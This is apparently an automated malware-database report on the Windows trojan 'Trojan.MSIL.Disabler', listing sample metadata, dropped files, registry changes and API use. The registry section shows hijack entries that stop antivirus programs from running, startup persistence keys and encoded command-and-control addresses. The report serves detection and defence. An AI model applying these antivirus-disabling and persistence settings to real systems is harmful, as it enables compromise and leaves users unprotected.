
Trojan.MSIL.Disabler

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 2,168
Threat Level: 80 % (High)
Infected Computers: 2,297
First Seen: March 27, 2024
Last Seen: April 17, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.MSIL.Disabler
Signature status: No Signature

Known Samples


Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is .NET application
  • File is 32-bit executable
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)


Windows PE Version Information

Name Value
Assembly Version
  • 2025.4.1.2
  • 11.6.0.0
  • 10.0.26100.6725
  • 8.4.1.0
  • 8.3.0.41085
  • 6.2.22621.1
  • 5.3.23.900
  • 5.2.46.2
  • 4.20.3.0
  • 2.0.0.62
  • 1.5.2.0
  • 1.3.7.0
  • 1.0.6.1
  • 1.0.0.0
  • 0.0.0.0
Assembly Version 0.0.0.0
Comments
  • 4winkey_pf
  • Launcher Premium GamesWteam
  • Main Immersed Agent .NET Component
  • Payload file for Umbral Stealer.
  • Payload for Umbral Stealer
  • Perfect Windows 10 & 11 setup with essential settings for maximum convenience
  • Program for the GTAV Speedrunning Community
  • This installation was built with Inno Setup.
  • True Mining Desktop Mining Software
Company Name
  • Abelssoft
  • GamesWteam
  • Haerubot
  • Hammer
  • HeroesVLobby
  • Immersed
  • KorepiLauncher
  • LSI Software S.A.
  • Magnet Forensics® Inc.
  • Microsoft Corporation
  • optimizerDuck
  • Project 1.27 Inc.
  • SpiidXP
  • True Mining
  • velocityfixer
File Description
  • 4winkey_pf
  • Client Server Runtime Process
  • Crysome.Client
  • csrss
  • Fix Eternity
  • FolderExcluder
  • Free, open-source Windows optimization tool for performance, privacy, and simplicity.
  • GastroServiceTool
  • GTweak
  • Haerubot
  • Hammer
  • HeroesVLobby
  • Immersed Agent GUI
  • InstaladorProsepagoNet
  • KorepiLauncher
  • Launcher MuOnline
  • luncher rayman aréna
  • Magnet AXIOM Process
  • Microsoft Edge Update
  • Project 127
  • ShellHost
  • sk_Drever
  • SN_Changer
  • SpiidXP
  • SSD Fresh
  • True Mining Desktop
  • velocityfixer
  • WarRock Montana Installer
File Version
  • 2025.4.1.2
  • 15.01.61691
  • 11.6.0.0
  • 10.0.26100.6725
  • 8.4.1.0
  • 8.3.0.41085
  • 6.2.22621.1
  • 5.3.23.900
  • 5.2.46.2
  • 4.20.3
  • 2.0.0.62
  • 1.5.2.0
  • 1.3.133.5
  • 1.3.7
  • 1.0.6.1
  • 1.0.0.3
  • 1.0.0.0
  • 0.0.0.0
Internal Name
  • 4winkey_pf.exe
  • AntidoteTool.exe
  • AXIOMProcess.exe
  • CPLApplet.dll
  • Crysome.Client.exe
  • csrss.exe
  • DrivessUbuntu
  • Fix Eternity.exe
  • FolderExcluder.exe
  • GastroServiceTool.exe
  • GTweak.exe
  • Haerubot.dll
  • Hammer.dll
  • HeroesVLobby.dll
  • Immersed.exe
  • InstaladorProsepagoNet.exe
  • KorepiLauncher.dll
  • LauncherGamesWteam.exe
  • Loader.exe
  • Manutenção.exe
  • Microsoft Edge Update
  • optimizerDuck.dll
  • PedalDownloader.exe
  • Project 1.27.exe
  • Ra_deo.exe
  • Realtek HD Audio Universal Service.exe
  • ShellHost.exe
  • SK_DRIVER.exe
  • SN Changer.exe
  • SpiidXP.dll
  • Steal2.exe
  • Stub.exe
  • TGX.dll
  • True Mining Desktop.dll
  • Update.exe
  • v31.exe
  • velocityfixer.dll
  • WarRock Installer.exe
  • winlogon.exe
  • XWormClient.exe
Language Id sr-Cyrl-RS
Legal Copyright
  • 4winkey_pf © 2023
  • Copyright (C) 2019-2023 True Mining
  • Copyright Microsoft Corporation
  • Copyright © 1907
  • Copyright © 2017 ~ 2025
  • Copyright © 2018
  • Copyright © 2019 Immersed Inc. All rights reserved.
  • Copyright © 2020
  • Copyright © 2022
  • Copyright © 2024
  • Copyright © 2025
  • Copyright © LSI Software S.A. 2025
  • Copyright © Magnet Forensics Inc. 2024
  • Copyright © WarRock Montana 2025
  • © 2024-2025 Greedeks
  • © Abelssoft, Inc.
  • © Microsoft Corporation. All rights reserved.
  • 파이널판타지14 KR 해루@모그리
Legal Trademarks
  • 4winkey_pf
  • GamesWteam
  • Greedeks
  • Project 1.27 TradeMark
Original Filename
  • 4winkey_pf.exe
  • AntidoteTool.exe
  • AXIOMProcess.exe
  • CPLApplet.dll
  • Crysome.Client.exe
  • csrss.exe
  • DrivessUbuntu
  • Fix Eternity.exe
  • FolderExcluder.exe
  • GastroServiceTool.exe
  • GTweak.exe
  • Haerubot.dll
  • Hammer.dll
  • HeroesVLobby.dll
  • Immersed.exe
  • InstaladorProsepagoNet.exe
  • KorepiLauncher.dll
  • LauncherGamesWteam.exe
  • Loader.exe
  • Manutenção.exe
  • msedgeupdate.dll
  • optimizerDuck.dll
  • PedalDownloader.exe
  • Project 1.27.exe
  • Ra_deo.exe
  • Realtek HD Audio Universal Service.exe
  • ShellHost.exe
  • SK_DRIVER.exe
  • SN Changer.exe
  • SpiidXP.dll
  • Steal2.exe
  • Stub.exe
  • TGX.dll
  • True Mining Desktop.dll
  • Update.exe
  • v31.exe
  • velocityfixer.dll
  • WarRock Installer.exe
  • winlogon.exe
  • XWormClient.exe
Product Name
  • 4winkey_pf
  • Crysome.Client
  • csrss
  • Fix Eternity
  • FolderExcluder
  • GastroServiceTool
  • GTweak
  • Haerubot
  • Hammer
  • HeroesVLobby
  • Immersed Agent
  • InstaladorProsepagoNet
  • KorepiLauncher
  • Launcher - GamesWteam
  • luncher rayman aréna
  • Magnet AXIOM Process
  • Microsoft Edge Update
  • Microsoft® Windows® Operating System
  • optimizerDuck
  • Project 127
  • sk_Drever
  • SN_Changer
  • SpiidXP
  • SSD Fresh
  • True Mining Desktop
  • velocityfixer
  • WarRock Montana Installer
Product Version
  • Build: 5.3.1
  • Build: 5.2.5
  • 2025.4.1.2
  • 15.01.61691
  • 11.6.0.0
  • 10.0.26100.6725
  • 8.4.1.0
  • 8.3.0.41085
  • 6.2.22621.1
  • 4.20.3
  • 2.0.0.62
  • 1.5.2.0
  • 1.3.133.5
  • 1.3.7+54db88b8f7971ce378ccb54aa257701c63f8e303
  • 1.0.0.3
  • 1.0.0.0
  • 1.0.0+d6d9fd5815cf8001a72523a99eff99b731e7b391
  • 1.0.0
  • 0.0.0.0
Upstream Version 1.3.99.0

Digital Signatures

Signer: Raecomm Services Ltd
Root: SSL.com Root Certification Authority RSA
Status: Root Not Trusted

File Traits

  • .NET
  • 2+ executable sections
  • Agile.net
  • big overlay
  • CreateThread
  • CryptUnprotectData
  • dll
  • Fody
  • Gdrive
  • HighEntropy
  • Installer Manifest
  • Installer Version
  • NewLateBinding
  • No CryptProtectData
  • No Version Info
  • ntdll
  • RAR (In Overlay)
  • RARinO
  • RijndaelManaged
  • Run
  • vmp section variant
  • WinRAR SFX
  • WRARSFX
  • WriteProcessMemory
  • x64
  • x86

Block Information

Total Blocks: 23
Potentially Malicious Blocks: 0
Whitelisted Blocks: 2
Unknown Blocks: 21

Visual Map

? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? ? ? ? 0 ?
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • MSIL.AsyncRAT.L
  • MSIL.Gamehack.BYJ
  • MSIL.Krypt.UJB

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134123407543776595.7060.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134199996858702057.3888.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\recovery\oem\xjd9xk95u1hy.exe Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\clr Synchronize,Write Attributes
c:\users\user\appdata\local\microsoft\clr\conhost.exe Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\clr\conhost.exe Synchronize,Write Attributes
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\1234.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\3.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_54qjub0j.jgm.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_a03gpzsk.by0.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_mawq4l2x.end.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_s3femh4g.hgm.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\crysome_debug.log Generic Write,Read Attributes
c:\users\user\appdata\local\temp\dis.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8jn9p.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-jh3nh.tmp\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\realtek hd audio universal service.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\sam x222c#.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\server.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\windows defender real time protection.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\winter.bll Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\unins000.dat Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\sysaudio.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows Synchronize,Write Attributes
c:\users\user\appdata\roaming\microsoft\windows\runtimebroker.exe Generic Write,Read Attributes
c:\users\user\appdata\roaming\microsoft\windows\runtimebroker.exe Synchronize,Write Attributes
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Attributes,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Data,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Data,Read Attributes,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\6a7601a6c8893a57a9f43a5489aa7ae7.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\6a7601a6c8893a57a9f43a5489aa7ae7.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\fc4788cecfc243df96ba2d9ed7c5cd02.exe Synchronize,Write Attributes
c:\users\user\appdata\roaming\server.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\server.exe Synchronize,Write Attributes
c:\users\user\appdata\roaming\svchost.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\svchost.exe Synchronize,Write Attributes
c:\users\user\downloads\__tmp_rar_sfx_access_check_79765 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\downloads\joliehack.exe Generic Write,Read Attributes
c:\users\user\downloads\joliehack.exe Synchronize,Write Attributes
c:\users\user\downloads\tt.pdf Generic Write,Read Attributes
c:\users\user\downloads\tt.pdf Synchronize,Write Attributes
c:\windows\appcompat\programs\amcache.hve Read Data,Read Control,Write Data
c:\windows\appcompat\programs\amcache.hve Write Attributes
c:\windows\appcompat\programs\amcache.hve.log1 Read Data,Write Data
c:\windows\appcompat\programs\amcache.hve.log2 Read Data,Write Data

Registry Modifications

Key::Value Data API Name
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory %windir%\tracing RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::failed_count RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state  RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes (NULL) RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes  RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKCU\software\microsoft\edge\elfbeacon::version 139.0.3405.125 RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::google updater C:\Users\Ucibtiup\AppData\Roaming\Microsoft\SysAudio.exe RegNtPreCreateKey
HKCU\software\6a7601a6c8893a57a9f43a5489aa7ae7::hp bXVyZGVyMjIyMi0zOTYyNS5wb3J0bWFwLmhvc3Q6Mzk2MjU6Mzk2MjUs RegNtPreCreateKey
HKCU::di ! RegNtPreCreateKey
HKCU\environment::see_mask_nozonechecks 1 RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::6a7601a6c8893a57a9f43a5489aa7ae7 "C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe" .. RegNtPreCreateKey
HKCU\software\0e75fed00639ea9e725255499292dcdd::hp NDUuMTQ1LjQxLjE3ODoyMjIyLA== RegNtPreCreateKey
HKCU\software\0e75fed00639ea9e725255499292dcdd::i ! RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::0e75fed00639ea9e725255499292dcdd "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" .. RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::0e75fed00639ea9e725255499292dcdd "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" .. RegNtPreCreateKey
HKCU\software\fc4788cecfc243df96ba2d9ed7c5cd02::hp MTI3LjAuMC4xOjEs RegNtPreCreateKey
HKCU\software\fc4788cecfc243df96ba2d9ed7c5cd02::i ! RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\advanced::hidden RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\control panel::cpls Top level key RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\control panel\cpls:: C:\ProgramData\ RegNtPreCreateKey
HKCU\software\1d0146db06ff2d2e93b6777d422f7734::us @ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\runonce::runtimebroker "C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe" RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\psuamain.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\psanhost.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\fsma32.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 碇ꛐ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 龦ꛗ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\fshoster.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㩽꜓옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 慞ꜚ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\masvc.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 샺Ꝛ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 폍ꝭ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\mcshield.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ㏢Ɪ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ᰗꟸ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ꟼ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ࠖꠄ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 醽ꠍ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 噐ꠒ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⶕ꠪옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 枘ꡄ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 죵ꡥ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\nortonsecurity.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 搷ꢂ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ǵꢟ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㪨ꢹ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䶎꣌옯ǜ RegNtPreCreateKey
HKLM\software\policies\microsoft\windows defender\spynet::submitsamplesconsent  RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 슠꣡옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⏍꤃옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㙪ꤖ옯ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAdjustPrivilegesToken
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
  • ntdll.dll!NtAlpcCreateResourceReserve
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelIoFileEx
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateUserProcess
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtGetContextThread
  • ntdll.dll!NtGetWriteWatch
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtLockFile
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory

179 additional items are not displayed above.

User Data Access
  • GetComputerName
  • GetComputerNameEx
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
  • OpenClipboard
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges
  • SetWindowsHookEx
Anti Debug
  • CheckRemoteDebuggerPresent
  • IsDebuggerPresent
  • NtQuerySystemInformation
  • OutputDebugString
Network Winsock2
  • WSAConnect
  • WSASend
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • bind
  • closesocket
  • freeaddrinfo
  • getaddrinfo
  • getpeername
  • inet_addr
  • recv
  • send
  • setsockopt
Network Winhttp
  • WinHttpOpen
Network Info Queried
  • GetAdaptersAddresses
  • GetNetworkParams
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ReadProcessMemory
Process Shell Execute
  • CreateProcess
  • ShellExecute
  • ShellExecuteEx
  • WriteConsole
Keyboard Access
  • GetAsyncKeyState
  • GetKeyState
Service Control
  • OpenSCManager
  • OpenService
Process Terminate
  • TerminateProcess
Network Icmp
  • IcmpCreateFile
  • IcmpSendEcho2

Shell Command Execution

C:\WINDOWS\system32\fondue.exe "C:\WINDOWS\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 944
(NULL) c:\users\user\downloads\tt.pdf
(NULL) c:\users\user\downloads\joliehack.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 936
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 960
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\Server.exe
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\dis.exe
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\3.exe
